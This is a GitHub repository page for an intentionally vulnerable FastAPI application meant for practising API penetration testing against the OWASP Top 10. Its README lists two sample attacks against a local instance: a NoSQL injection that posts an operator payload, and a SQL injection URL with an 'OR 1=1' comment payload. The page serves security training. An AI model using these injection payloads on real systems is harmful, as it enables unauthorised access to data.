Skip to content

Vulnerable FastAPI in reference to Opensource Web Application Security Project (OWASP) TOP 10: 2021

License

Notifications You must be signed in to change notification settings

naryal2580/vfapi

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

30 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Vulnerable FastAPI Logo

Vulnerable FastAPI, compliant to OWASP TOP 10: 2021
⚠️ Under Development ⚠️

Vulnerable FastAPI is a simple vulnerable FastAPI application for learning API pentesting on vulnerable API endpoints. Please refer to /docs for information regarding endpoints.


Current exploitation examples

$ export HOST="127.0.0.1"; export PORT=8888

NoSQLi

$ curl -s "http://$HOST:$PORT/find" -H 'Content-Type: application/json' -d '{"id":{"$in":[1,2]}}' | jq

SQLi

$ curl -s "http://$HOST:$PORT/select?username=%22%20OR%201%3D1%3B%20--%20" | jq

Thanks